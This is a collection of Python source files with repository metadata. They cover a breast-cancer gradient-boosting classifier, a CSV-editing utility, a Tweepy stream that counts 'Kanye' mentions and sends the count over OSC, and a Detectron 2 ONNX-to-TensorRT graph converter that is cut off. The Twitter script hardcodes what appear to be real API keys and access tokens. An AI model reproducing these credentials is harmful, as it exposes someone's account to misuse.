min_samples_leaf = 31,\n # min_samples_split = 61,\n # learning_rate = 0.04164996932068887, #####0.8165,\n # subsample = 0.9028945206061637,\n # random_state = 10\n # )\n#########################77777RD\n # n_estimators = 153,\n # max_depth = 29,\n # min_samples_leaf = 22,\n # min_samples_split = 10,\n # learning_rate = 0.03722959187506328, #####0.8165,\n # subsample = 0.8825137316466605,\n # random_state = 10\n # )\n######################777777BO\n # n_estimators=122,\n # max_depth=44,\n # min_samples_leaf=73,\n # min_samples_split=41,\n # learning_rate=0.07692109714557302, #####0.8165,\n # subsample=0.8825137316466605,\n # random_state=10\n # )\n # ########################8888RD\n # n_estimators=414,\n # max_depth=7,\n # min_samples_leaf=19,\n # min_samples_split=77,\n # learning_rate=0.2860336309242806, #####0.8165,\n # subsample=0.9933219217119194,\n # random_state=10\n # )\n ##########################8888BO\n # n_estimators=238,\n # max_depth=16,\n # min_samples_leaf=70,\n # min_samples_split=84,\n # learning_rate=0.6954629752796418, #####0.8165,\n # subsample=0.999219920154008,\n # random_state=10\n # )\n\n # ####################999999RD\n # n_estimators=254,\n # max_depth=7,\n # min_samples_leaf=78,\n # min_samples_split=13,\n # learning_rate=0.0760937193688753, #####0.8165,\n # subsample=0.9636631827836868,\n # random_state=10\n # )\n\n # ####################99999BO\n # n_estimators=375,\n # max_depth=14,\n # min_samples_leaf=72,\n # min_samples_split=26,\n # learning_rate=0.04850690819245295, #####0.8165,\n # subsample= 0.9077637360771138,\n # random_state=10\n # )\n###########################10 RD\n # n_estimators=316,\n # max_depth=29,\n # min_samples_leaf=94,\n # min_samples_split=19,\n # learning_rate=0.04850690819245295, #####0.8165,\n # subsample=0.9588579405215747,\n # random_state=10\n # )\n\n\n ###########################10 BO\n # n_estimators=196,\n # max_depth=36,\n # min_samples_leaf=91,\n # min_samples_split=15,\n # learning_rate=0.013129646271213751, #####0.8165,\n # subsample= 0.9050781844584811,\n # random_state=10\n # )\n\n\n clf_gbr = gbr.fit(x_train, y_train)\n y_gbr_pred = clf_gbr.predict(x_valid)\n y_gbr_pred_t = clf_gbr.predict(x_test)\n balance6 = balance(y_gbr_pred, y_valid, y_gbr_pred_t, y_test)\n gbdt_b_acc.append(balance6)\n auc_gbr = roc_auc_score(y_test, y_gbr_pred_t)\n gbdt_auc.append(auc_gbr)\n gbr_confusion = confusion_matrix(y_test, y_gbr_pred_t)\n\n # print(\"balance GBDT:\" + str(balance6))\n # print(\"AUC_gbr:\" + str(auc_gbr))\n # print(\"gbr confusion:\")\n acc,ses,spc,prc,f1 = metrics(gbr_confusion)\n gbdt_acc.append(acc)\n gbdt_ses.append(ses)\n gbdt_spc.append(spc)\n gbdt_prc.append(prc)\n gbdt_f1.append(f1)\n\nave_acc = np.mean(gbdt_acc)\nave_b_acc= np.mean(gbdt_b_acc)\nave_auc = np.mean(gbdt_auc)\nave_ses = np.mean(gbdt_ses)\nave_spc =np.mean(gbdt_spc)\nave_prc = np.mean(gbdt_prc)\nave_f1= np.mean(gbdt_f1)\n\n# std_acc = np.std(gbdt_acc)\n# std_b_acc= np.std(gbdt_b_acc)\n# std_auc = np.std(gbdt_auc)\n# std_ses = np.std(gbdt_ses)\n# std_spc =np.std(gbdt_spc)\n# std_prc = np.std(gbdt_prc)\n# std_f1= np.std(gbdt_f1)\n\n\n# std_acc = np.var(gbdt_acc)\n# std_b_acc= np.var(gbdt_b_acc)\n# std_auc = np.var(gbdt_auc)\n# std_ses = np.var(gbdt_ses)\n# std_spc =np.var(gbdt_spc)\n# std_prc = np.var(gbdt_prc)\n# std_f1= np.var(gbdt_f1)\n\nprint(\"acc:\"+ str(ave_acc))\nprint(\"b_acc:\" + str(ave_b_acc))\nprint(\"auc:\" + str(ave_auc))\nprint(\"ses:\" + str(ave_ses))\nprint(\"spc:\" + str(ave_spc))\nprint(\"prc: \"+ str(ave_prc))\nprint(\"f1:\" + str(ave_f1))\n\n# print(\"acc:\"+ str(std_acc))\n# print(\"b_acc:\" + str(std_b_acc))\n# print(\"auc:\" + str(std_auc))\n# print(\"ses:\" + str(std_ses))\n# print(\"spc:\" + str(std_spc))\n# print(\"prc: \"+ str(std_prc))\n# print(\"f1:\" + str(std_f1))\n\n\n\n\n\n\n", "repo_name": "cherry567/breast_cancer_classification", "sub_path": "Classification/Classifier.py", "file_name": "Classifier.py", "file_ext": "py", "file_size_in_byte": 17140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 177, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 195, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 280, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 491, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 493, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 505, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 506, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 507, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 508, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 510, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 511, "usage_type": "call"}]}
+{"seq_id": "32791378455", "text": "import pandas as pd \nimport yaml\nimport pathlib as pt \n\ndef angio_modify (df):\n \n print (df , df.shape)\n angioloader_list=[]\n for ind in df.index : \n path = df['images_path'][ind]\n p = pt.Path(path).parents[0]\n angio_loader_path=pt.Path(p)/\"angio_loader_header.json\"\n \n angioloader_list.append(angio_loader_path)\n df[\"angio_loader_header\"]=angioloader_list\n return df \n \n \n \n\ndef main():\n \n config = None\n with open('config.yaml') as f: # reads .yml/.yaml files\n config = yaml.safe_load(f)\n \n df=pd.read_csv(config['data']['dataset_csv']) \n new=angio_modify(df)\n new.to_csv(config['data']['dataset_csv'])\n \n\n\nif __name__ == \"__main__\":\n main()", "repo_name": "RazvanAVESALON/PROIECT_ANGIOGRAFII", "sub_path": "utils/ModifyCSV.py", "file_name": "ModifyCSV.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 11, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "70562329128", "text": "from tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nimport json\n# import pandas as pd\nimport re\nimport time\nfrom pythonosc import osc_message_builder\nfrom pythonosc import udp_client\nimport argparse\n# import matplotlib.pyplot as plt\n\n# Based on http://adilmoujahid.com/posts/2014/07/twitter-analytics/\n\naccess_token = \"377135231-oGgtj8unrSCSaxqsehC80g9BZCiukT9fpdnnB1y7\"\naccess_token_secret = \"XucJ82KGGWpHAite0K5DLjQa9bz41zC1TQa0wL3wCwbSs\"\nconsumer_key = \"IZ8u1kNdtQTPYs1F3DdcsF5ty\"\nconsumer_secret = \"WhrhP4GknpNJcY6ZGX2USb13PBGSjSBR7NJJcDFAVIyJlkTw7r\"\n\ntime = time.time()\nprint(time)\n\nclass StdOutListener(StreamListener):\n\n def on_data(self, data):\n m = 0.0\n # print data\n try:\n data = json.loads(data)\n regex = re.compile(r\"[Kk]anye\")\n m = regex.findall(data[\"text\"])\n if(len(m) == 0):\n print(data[\"text\"])\n # print(data[\"entities\"][\"hashtags\"])\n print(len(m))\n # print(data[\"text\"])\n except:\n pass\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", default=\"127.0.0.1\",\n help=\"The ip of the OSC server\")\n parser.add_argument(\"--port\", type=int, default=6448,\n help=\"The port the OSC server is listening on\")\n args = parser.parse_args()\n\n client = udp_client.SimpleUDPClient(args.ip, args.port)\n message_to_send = float(len(m))\n client.send_message(\"/wek/inputs\", message_to_send)\n\n # print(\"========\")\n return True\n\n def on_error(self, status):\n print(status)\n\nif __name__ == '__main__':\n\n #This handles Twitter authetification and the connection to Twitter Streaming API\n l = StdOutListener()\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n stream = Stream(auth, l)\n\n #This line filter Twitter Streams to capture data by the keywords: 'python', 'javascript', 'ruby'\n stream.filter(track=['Kanye', 'kanye'])\n", "repo_name": "aurbanski/I-FeatExt-Urbanski", "sub_path": "Assignment5.py", "file_name": "Assignment5.py", "file_ext": "py", "file_size_in_byte": 2096, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "tweepy.streaming.StreamListener", "line_number": 23, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 29, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 30, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 40, "usage_type": "call"}, {"api_name": "pythonosc.udp_client.SimpleUDPClient", "line_number": 47, "usage_type": "call"}, {"api_name": "pythonosc.udp_client", "line_number": 47, "usage_type": "name"}, {"api_name": "tweepy.OAuthHandler", "line_number": 61, "usage_type": "call"}, {"api_name": "tweepy.Stream", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "70315458087", "text": "import os\nimport re\nimport sys\nimport argparse\nimport logging\nimport cv2\nimport onnx_graphsurgeon as gs\nimport numpy as np\nimport onnx\nfrom onnx import shape_inference\nimport torch\n\ntry:\n from detectron2.engine.defaults import DefaultPredictor\n from detectron2.modeling import build_model\n from detectron2.config import get_cfg\n from detectron2.structures import ImageList\nexcept ImportError:\n print(\"Could not import Detectron 2 modules. Maybe you did not install Detectron 2\")\n print(\"Please install Detectron 2, check https://github.com/facebookresearch/detectron2/blob/main/INSTALL.md\")\n sys.exit(1)\n\nimport onnx_utils\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger(\"ModelHelper\").setLevel(logging.INFO)\nlog = logging.getLogger(\"ModelHelper\")\n\n\nclass DET2GraphSurgeon:\n def __init__(self, saved_model_path, config_file, weights):\n \"\"\"\n Constructor of the Model Graph Surgeon object, to do the conversion of a Detectron 2 Mask R-CNN exported model\n to an ONNX-TensorRT parsable model.\n :param saved_model_path: The path pointing to the exported Detectron 2 Mask R-CNN ONNX model.\n :param config_file: The path pointing to the Detectron 2 yaml file which describes the model.\n :param config_file: Weights to load for the Detectron 2 model.\n \"\"\"\n\n def det2_setup(config_file, weights):\n \"\"\"\n Create configs and perform basic setups.\n \"\"\"\n cfg = get_cfg()\n cfg.merge_from_file(config_file)\n cfg.merge_from_list([\"MODEL.WEIGHTS\", weights])\n cfg.freeze()\n return cfg\n\n # Import exported Detectron 2 Mask R-CNN ONNX model as GraphSurgeon object.\n self.graph = gs.import_onnx(onnx.load(saved_model_path))\n assert self.graph\n log.info(\"ONNX graph loaded successfully\")\n\n # Fold constants via ONNX-GS that exported script might've missed.\n self.graph.fold_constants()\n\n # Set up Detectron 2 model configuration.\n self.det2_cfg = det2_setup(config_file, weights)\n\n # Getting model characteristics.\n self.fpn_out_channels = self.det2_cfg.MODEL.FPN.OUT_CHANNELS\n self.num_classes = self.det2_cfg.MODEL.ROI_HEADS.NUM_CLASSES\n self.first_NMS_max_proposals = self.det2_cfg.MODEL.RPN.POST_NMS_TOPK_TEST\n self.first_NMS_iou_threshold = self.det2_cfg.MODEL.RPN.NMS_THRESH\n self.first_NMS_score_threshold = 0.01\n self.first_ROIAlign_pooled_size = self.det2_cfg.MODEL.ROI_BOX_HEAD.POOLER_RESOLUTION\n self.first_ROIAlign_sampling_ratio = self.det2_cfg.MODEL.ROI_BOX_HEAD.POOLER_SAMPLING_RATIO\n self.first_ROIAlign_type = self.det2_cfg.MODEL.ROI_BOX_HEAD.POOLER_TYPE\n self.second_NMS_max_proposals = self.det2_cfg.TEST.DETECTIONS_PER_IMAGE\n self.second_NMS_iou_threshold = self.det2_cfg.MODEL.ROI_HEADS.NMS_THRESH_TEST\n self.second_NMS_score_threshold = self.det2_cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST\n self.second_ROIAlign_pooled_size = self.det2_cfg.MODEL.ROI_MASK_HEAD.POOLER_RESOLUTION\n self.second_ROIAlign_sampling_ratio = self.det2_cfg.MODEL.ROI_MASK_HEAD.POOLER_SAMPLING_RATIO\n self.second_ROIAlign_type = self.det2_cfg.MODEL.ROI_MASK_HEAD.POOLER_TYPE\n self.mask_out_res = 28\n\n # Model characteristics.\n log.info(\"Number of FPN output channels is {}\".format(self.fpn_out_channels))\n log.info(\"Number of classes is {}\".format(self.num_classes))\n log.info(\"First NMS max proposals is {}\".format(self.first_NMS_max_proposals))\n log.info(\"First NMS iou threshold is {}\".format(self.first_NMS_iou_threshold))\n log.info(\"First NMS score threshold is {}\".format(self.first_NMS_score_threshold))\n log.info(\"First ROIAlign type is {}\".format(self.first_ROIAlign_type))\n log.info(\"First ROIAlign pooled size is {}\".format(self.first_ROIAlign_pooled_size))\n log.info(\"First ROIAlign sampling ratio is {}\".format(self.first_ROIAlign_sampling_ratio))\n log.info(\"Second NMS max proposals is {}\".format(self.second_NMS_max_proposals))\n log.info(\"Second NMS iou threshold is {}\".format(self.second_NMS_iou_threshold))\n log.info(\"Second NMS score threshold is {}\".format(self.second_NMS_score_threshold))\n log.info(\"Second ROIAlign type is {}\".format(self.second_ROIAlign_type))\n log.info(\"Second ROIAlign pooled size is {}\".format(self.second_ROIAlign_pooled_size))\n log.info(\"Second ROIAlign sampling ratio is {}\".format(self.second_ROIAlign_sampling_ratio))\n log.info(\"Individual mask output resolution is {}x{}\".format(self.mask_out_res, self.mask_out_res))\n\n self.batch_size = None\n\n def sanitize(self):\n \"\"\"\n Sanitize the graph by cleaning any unconnected nodes, do a topological resort, and fold constant inputs values.\n When possible, run shape inference on the ONNX graph to determine tensor shapes.\n \"\"\"\n\n for i in range(3):\n count_before = len(self.graph.nodes)\n self.graph.cleanup().toposort()\n try:\n for node in self.graph.nodes:\n for o in node.outputs:\n o.shape = None\n model = gs.export_onnx(self.graph)\n model = shape_inference.infer_shapes(model)\n self.graph = gs.import_onnx(model)\n except Exception as e:\n log.info(\"Shape inference could not be performed at this time:\\n{}\".format(e))\n try:\n self.graph.fold_constants(fold_shapes=True)\n except TypeError as e:\n log.error(\"This version of ONNX GraphSurgeon does not support folding shapes, please upgrade your \"\n \"onnx_graphsurgeon module. Error:\\n{}\".format(e))\n raise\n\n count_after = len(self.graph.nodes)\n if count_before == count_after:\n # No new folding occurred in this iteration, so we can stop for now.\n break\n\n def get_anchors(self, sample_image):\n \"\"\"\n Detectron 2 exported ONNX does not contain anchors required for efficientNMS plug-in, so they must be generated\n \"offline\" by calling actual Detectron 2 model and getting anchors from it.\n :param sample_image: Sample image required to run through the model and obtain anchors.\n Can be any image from a dataset. Make sure listed here Detectron 2 preprocessing steps\n actually match your preprocessing steps. Otherwise, behavior can be unpredictable.\n Additionally, anchors have to be generated for a fixed input dimensions,\n meaning as soon as image leaves a preprocessor and enters predictor.model.backbone() it must have\n a fixed dimension (1344x1344 in my case) that every single image in dataset must follow, since currently\n TensorRT plug-ins do not support dynamic shapes.\n \"\"\"\n # Get Detectron 2 model config and build it.\n predictor = DefaultPredictor(self.det2_cfg)\n model = build_model(self.det2_cfg)\n\n # Image preprocessing.\n input_im = cv2.imread(sample_image)\n raw_height, raw_width = input_im.shape[:2]\n image = predictor.aug.get_transform(input_im).apply_image(input_im)\n image = torch.as_tensor(image.astype(\"float32\").transpose(2, 0, 1))\n\n # Model preprocessing.\n inputs = [{\"image\": image, \"height\": raw_height, \"width\": raw_width}]\n images = [x[\"image\"].to(model.device) for x in inputs]\n images = [(x - model.pixel_mean) / model.pixel_std for x in images]\n imagelist_images = ImageList.from_tensors(images, 1344)\n\n # Get feature maps from backbone.\n features = predictor.model.backbone(imagelist_images.tensor)\n\n # Get proposals from Region Proposal Network and obtain anchors from anchor generator.\n features = [features[f] for f in predictor.model.proposal_generator.in_features]\n det2_anchors = predictor.model.proposal_generator.anchor_generator(features)\n\n # Extract anchors based on feature maps in ascending order (P2->P6).\n p2_anchors = det2_anchors[0].tensor.detach().cpu().numpy()\n p3_anchors = det2_anchors[1].tensor.detach().cpu().numpy()\n p4_anchors = det2_anchors[2].tensor.detach().cpu().numpy()\n p5_anchors = det2_anchors[3].tensor.detach().cpu().numpy()\n p6_anchors = det2_anchors[4].tensor.detach().cpu().numpy()\n final_anchors = np.concatenate((p2_anchors,p3_anchors,p4_anchors,p5_anchors,p6_anchors))\n\n return final_anchors\n\n def save(self, output_path):\n \"\"\"\n Save the ONNX model to the given location.\n :param output_path: Path pointing to the location where to write out the updated ONNX model.\n \"\"\"\n self.graph.cleanup().toposort()\n model = gs.export_onnx(self.graph)\n output_path = os.path.realpath(output_path)\n os.makedirs(os.path.dirname(output_path), exist_ok=True)\n onnx.save(model, output_path)\n log.info(\"Saved ONNX model to {}\".format(output_path))\n\n def update_preprocessor(self, batch_size):\n \"\"\"\n Remove all the pre-processing nodes in the ONNX graph and leave only the image normalization essentials.\n :param batch_size: The batch size to use for the ONNX graph.\n \"\"\"\n # Set graph inputs.\n self.batch_size = batch_size\n self.height = self.graph.inputs[0].shape[1]\n self.width = self.graph.inputs[0].shape[2]\n\n input_shape = [self.batch_size, 3, self.height, self.width]\n self.graph.inputs[0].shape = input_shape\n self.graph.inputs[0].dtype = np.float32\n self.graph.inputs[0].name = \"input_tensor\"\n\n self.sanitize()\n log.info(\"ONNX graph input shape: {} [NCHW format set]\".format(self.graph.inputs[0].shape))\n\n # Find the initial nodes of the graph, whatever the input is first connected to, and disconnect them.\n for node in [node for node in self.graph.nodes if self.graph.inputs[0] in node.inputs]:\n node.inputs.clear()\n\n # Get input tensor.\n input_tensor = self.graph.inputs[0]\n\n # Create preprocessing Sub node and connect input tensor to it.\n sub_const = np.expand_dims(np.asarray([255 * 0.406, 255 * 0.456, 255 * 0.485], dtype=np.float32), axis=(1, 2))\n sub_out = self.graph.op_with_const(\"Sub\", \"preprocessor/mean\", input_tensor, sub_const)\n\n # Find first Div node and connect to output of Sub node.\n div_node = self.graph.find_node_by_op(\"Div\")\n log.info(\"Found {} node\".format(div_node.op))\n div_node.inputs[0] = sub_out[0]\n\n # Find first Conv and connect preprocessor directly to it.\n conv_node = self.graph.find_node_by_op(\"Conv\")\n log.info(\"Found {} node\".format(conv_node.op))\n conv_node.inputs[0] = div_node.outputs[0]\n\n # Reshape nodes tend to update the batch dimension to a fixed value of 1, they should use the batch size instead.\n for node in [node for node in self.graph.nodes if node.op == \"Reshape\"]:\n if type(node.inputs[1]) == gs.Constant and node.inputs[1].values[0] == 1:\n node.inputs[1].values[0] = self.batch_size\n\n def NMS(self, boxes, scores, anchors, background_class, score_activation, max_proposals, iou_threshold, nms_score_threshold, user_threshold, nms_name=None):\n # Helper function to create the NMS Plugin node with the selected inputs.\n # EfficientNMS_TRT TensorRT Plugin is suitable for our use case.\n # :param boxes: The box predictions from the Box Net.\n # :param scores: The class predictions from the Class Net.\n # :param anchors: The default anchor coordinates.\n # :param background_class: The label ID for the background class.\n # :param max_proposals: Number of proposals made by NMS.\n # :param score_activation: If set to True - apply sigmoid activation to the confidence scores during NMS operation,\n # if false - no activation.\n # :param iou_threshold: NMS intersection over union threshold, given by self.det2_cfg.\n # :param nms_score_threshold: NMS score threshold, given by self.det2_cfg.\n # :param user_threshold: User's given threshold to overwrite default NMS score threshold.\n # :param nms_name: Name of NMS node in a graph, renames NMS elements accordingly in order to eliminate cycles.\n\n if nms_name is None:\n nms_name = \"\"\n else:\n nms_name = \"_\" + nms_name\n\n # Set score threshold.\n score_threshold = nms_score_threshold if user_threshold is None else user_threshold\n\n # NMS Outputs.\n nms_output_num_detections = gs.Variable(name=\"num_detections\"+nms_name, dtype=np.int32, shape=[self.batch_size, 1])\n nms_output_boxes = gs.Variable(name=\"detection_boxes\"+nms_name, dtype=np.float32,\n shape=[self.batch_size, max_proposals, 4])\n nms_output_scores = gs.Variable(name=\"detection_scores\"+nms_name, dtype=np.float32,\n shape=[self.batch_size, max_proposals])\n nms_output_classes = gs.Variable(name=\"detection_classes\"+nms_name, dtype=np.int32,\n shape=[self.batch_size, max_proposals])\n\n nms_outputs = [nms_output_num_detections, nms_output_boxes, nms_output_scores, nms_output_classes]\n\n # Plugin.\n self.graph.plugin(\n op=\"EfficientNMS_TRT\",\n name=\"nms\"+nms_name,\n inputs=[boxes, scores, anchors],\n outputs=nms_outputs,\n attrs={\n 'plugin_version': \"1\",\n 'background_class': background_class,\n 'max_output_boxes': max_proposals,\n 'score_threshold': max(0.01, score_threshold),\n 'iou_threshold': iou_threshold,\n 'score_activation': score_activation,\n 'class_agnostic': False,\n 'box_coding': 1,\n }\n )\n log.info(\"Created nms{} with EfficientNMS_TRT plugin\".format(nms_name))\n\n return nms_outputs\n\n def ROIAlign(self, rois, p2, p3, p4, p5, pooled_size, sampling_ratio, roi_align_type, num_rois, ra_name):\n # Helper function to create the ROIAlign Plugin node with the selected inputs.\n # PyramidROIAlign_TRT TensorRT Plugin is suitable for our use case.\n # :param rois: Regions of interest/detection boxes outputs from preceding NMS node.\n # :param p2: Output of p2 feature map.\n # :param p3: Output of p3 feature map.\n # :param p4: Output of p4 feature map.\n # :param p5: Output of p5 feature map.\n # :param pooled_size: Pooled output dimensions.\n # :param sampling_ratio: Number of sampling points in the interpolation grid used to compute the output value of each pooled output bin.\n # :param roi_align_type: Type of Detectron 2 ROIAlign op, either ROIAlign (vanilla) or ROIAlignV2 (0.5 coordinate offset).\n # :param num_rois: Number of ROIs resulting from ROIAlign operation.\n # :param ra_name: Name of ROIAlign node in a graph, renames ROIAlign elements accordingly in order to eliminate cycles.\n\n # Different types of Detectron 2's ROIAlign ops require coordinate offset that is supported by PyramidROIAlign_TRT.\n if roi_align_type == \"ROIAlignV2\":\n roi_coords_transform = 2\n elif roi_align_type == \"ROIAlign\":\n roi_coords_transform = 0\n\n # ROIAlign outputs.\n roi_align_output = gs.Variable(name=\"roi_align/output_\"+ra_name, dtype=np.float32,\n shape=[self.batch_size, num_rois, self.fpn_out_channels, pooled_size, pooled_size])\n\n # Plugin.\n self.graph.plugin(\n op=\"PyramidROIAlign_TRT\",\n name=\"roi_align_\"+ra_name,\n inputs=[rois, p2, p3, p4, p5],\n outputs=[roi_align_output],\n attrs={\n 'plugin_version': \"1\",\n 'fpn_scale': 224,\n 'pooled_size': pooled_size,\n 'image_size': [self.height, self.width],\n 'roi_coords_absolute': 0,\n 'roi_coords_swap': 0,\n 'roi_coords_transform': roi_coords_transform,\n 'sampling_ratio': sampling_ratio,\n }\n )\n log.info(\"Created {} with PyramidROIAlign_TRT plugin\".format(ra_name))\n\n return roi_align_output\n\n def process_graph(self, anchors, first_nms_threshold=None, second_nms_threshold=None):\n \"\"\"\n Processes the graph to replace the GenerateProposals and BoxWithNMSLimit operations with EfficientNMS_TRT\n TensorRT plugin nodes and ROIAlign operations with PyramidROIAlign_TRT plugin nodes.\n :param anchors: Anchors generated from sample image \"offline\" by Detectron 2, since anchors are not provided\n inside the graph.\n :param first_nms_threshold: Override the 1st NMS score threshold value. If set to None, use the value in the graph.\n :param second_nms_threshold: Override the 2nd NMS score threshold value. If set to None, use the value in the graph.\n \"\"\"\n def backbone():\n \"\"\"\n Updates the graph to replace all ResizeNearest ops with ResizeNearest plugins in backbone.\n \"\"\"\n # Get final backbone outputs.\n p2 = self.graph.find_node_by_op_name(\"Conv\", \"/backbone/fpn_output2/Conv\")\n p3 = self.graph.find_node_by_op_name(\"Conv\", \"/backbone/fpn_output3/Conv\")\n p4 = self.graph.find_node_by_op_name(\"Conv\", \"/backbone/fpn_output4/Conv\")\n p5 = self.graph.find_node_by_op_name(\"Conv\", \"/backbone/fpn_output5/Conv\")\n\n\n return p2.outputs[0], p3.outputs[0], p4.outputs[0], p5.outputs[0]\n\n def proposal_generator(anchors, first_nms_threshold):\n \"\"\"\n Updates the graph to replace all GenerateProposals Caffe ops with one single NMS for proposals generation.\n :param anchors: Anchors generated from sample image \"offline\" by Detectron 2, since anchors are not provided\n inside the graph\n :param first_nms_threshold: Override the 1st NMS score threshold value. If set to None, use the value in the graph.\n \"\"\"\n # Get nodes containing final objectness logits.\n p2_logits = self.graph.find_node_by_op_name(\"Flatten\", \"/proposal_generator/Flatten\")\n p3_logits = self.graph.find_node_by_op_name(\"Flatten\", \"/proposal_generator/Flatten_1\")\n p4_logits = self.graph.find_node_by_op_name(\"Flatten\", \"/proposal_generator/Flatten_2\")\n p5_logits = self.graph.find_node_by_op_name(\"Flatten\", \"/proposal_generator/Flatten_3\")\n p6_logits = self.graph.find_node_by_op_name(\"Flatten\", \"/proposal_generator/Flatten_4\")\n\n # Get nodes containing final anchor_deltas.\n p2_anchors = self.graph.find_node_by_op_name(\"Reshape\", \"/proposal_generator/Reshape_1\")\n p3_anchors = self.graph.find_node_by_op_name(\"Reshape\", \"/proposal_generator/Reshape_3\")\n p4_anchors = self.graph.find_node_by_op_name(\"Reshape\", \"/proposal_generator/Reshape_5\")\n p5_anchors = self.graph.find_node_by_op_name(\"Reshape\", \"/proposal_generator/Reshape_7\")\n p6_anchors = self.graph.find_node_by_op_name(\"Reshape\", \"/proposal_generator/Reshape_9\")\n\n # Concatenate all objectness logits/scores data.\n scores_inputs = [p2_logits.outputs[0], p3_logits.outputs[0], p4_logits.outputs[0], p5_logits.outputs[0], p6_logits.outputs[0]]\n scores_tensor = self.graph.layer(name=\"scores\", op=\"Concat\", inputs=scores_inputs, outputs=['scores'], attrs={'axis': 1})[0]\n # Unsqueeze to add 3rd dimension of 1 to match tensor dimensions of boxes tensor.\n scores = self.graph.unsqueeze(\"scores_unsqueeze\", scores_tensor, [2])[0]\n\n # Concatenate all boxes/anchor_delta data.\n boxes_inputs = [p2_anchors.outputs[0], p3_anchors.outputs[0], p4_anchors.outputs[0], p5_anchors.outputs[0], p6_anchors.outputs[0]]\n boxes = self.graph.layer(name=\"boxes\", op=\"Concat\", inputs=boxes_inputs, outputs=['anchors'], attrs={'axis': 1})[0]\n\n # Convert the anchors from Corners to CenterSize encoding.\n anchors = np.matmul(anchors, [[0.5, 0, -1, 0], [0, 0.5, 0, -1], [0.5, 0, 1, 0], [0, 0.5, 0, 1]])\n anchors = anchors / [self.width, self.height, self.width, self.height] # Normalize anchors to [0-1] range\n anchors = np.expand_dims(anchors, axis=0)\n anchors = anchors.astype(np.float32)\n anchors = gs.Constant(name=\"default_anchors\", values=anchors)\n\n # Create NMS node.\n nms_outputs = self.NMS(boxes, scores, anchors, -1, False, self.first_NMS_max_proposals, self.first_NMS_iou_threshold, self.first_NMS_score_threshold, first_nms_threshold, 'rpn')\n\n return nms_outputs\n\n def roi_heads(rpn_outputs, p2, p3, p4, p5, second_nms_threshold):\n \"\"\"\n Updates the graph to replace all ROIAlign Caffe ops with one single pyramid ROIAlign. Eliminates CollectRpnProposals\n DistributeFpnProposals and BatchPermutation nodes that are not supported by TensorRT. Connects pyramid ROIAlign to box_head\n and connects box_head to final box head outputs in a form of second NMS. In order to implement mask head outputs,\n similar steps as in box_pooler are performed to replace mask_pooler. Finally, reimplemented mask_pooler is connected to\n mask_head and mask head outputs are produced.\n :param rpn_outputs: Outputs of the first NMS/proposal generator.\n :param p2: Output of p2 feature map, required for ROIAlign operation.\n :param p3: Output of p3 feature map, required for ROIAlign operation.\n :param p4: Output of p4 feature map, required for ROIAlign operation.\n :param p5: Output of p5 feature map, required for ROIAlign operation.\n :param second_nms_threshold: Override the 2nd NMS score threshold value. If set to None, use the value in the graph.\n \"\"\"\n # Create ROIAlign node.\n box_pooler_output = self.ROIAlign(rpn_outputs[1], p2, p3, p4, p5, self.first_ROIAlign_pooled_size, self.first_ROIAlign_sampling_ratio, self.first_ROIAlign_type, self.first_NMS_max_proposals, 'box_pooler')\n\n # Reshape node that prepares ROIAlign/box pooler output for Gemm node that comes next.\n box_pooler_shape = np.asarray([-1, self.fpn_out_channels*self.first_ROIAlign_pooled_size*self.first_ROIAlign_pooled_size], dtype=np.int64)\n box_pooler_reshape = self.graph.op_with_const(\"Reshape\", \"box_pooler/reshape\", box_pooler_output, box_pooler_shape)\n\n # Get first Gemm op of box head and connect box pooler to it.\n first_box_head_gemm = self.graph.find_node_by_op_name(\"Gemm\", \"/roi_heads/box_head/fc1/Gemm\")\n first_box_head_gemm.inputs[0] = box_pooler_reshape[0]\n\n # Get final two nodes of box predictor. Softmax op for cls_score, Gemm op for bbox_pred.\n cls_score = self.graph.find_node_by_op_name(\"Softmax\", \"/roi_heads/Softmax\")\n bbox_pred = self.graph.find_node_by_op_name(\"Gemm\", \"/roi_heads/box_predictor/bbox_pred/Gemm\")\n\n # Linear transformation to convert box coordinates from (TopLeft, BottomRight) Corner encoding\n # to CenterSize encoding. 1st NMS boxes are multiplied by transformation matrix in order to\n # encode it into CenterSize format.\n matmul_const = np.matrix('0.5 0 -1 0; 0 0.5 0 -1; 0.5 0 1 0; 0 0.5 0 1', dtype=np.float32)\n matmul_out = self.graph.matmul(\"RPN_NMS/detection_boxes_conversion\", rpn_outputs[1], matmul_const)\n\n # Reshape node that prepares bbox_pred for scaling and second NMS.\n bbox_pred_shape = np.asarray([self.batch_size, self.first_NMS_max_proposals, self.num_classes, 4], dtype=np.int64)\n bbox_pred_reshape = self.graph.op_with_const(\"Reshape\", \"bbox_pred/reshape\", 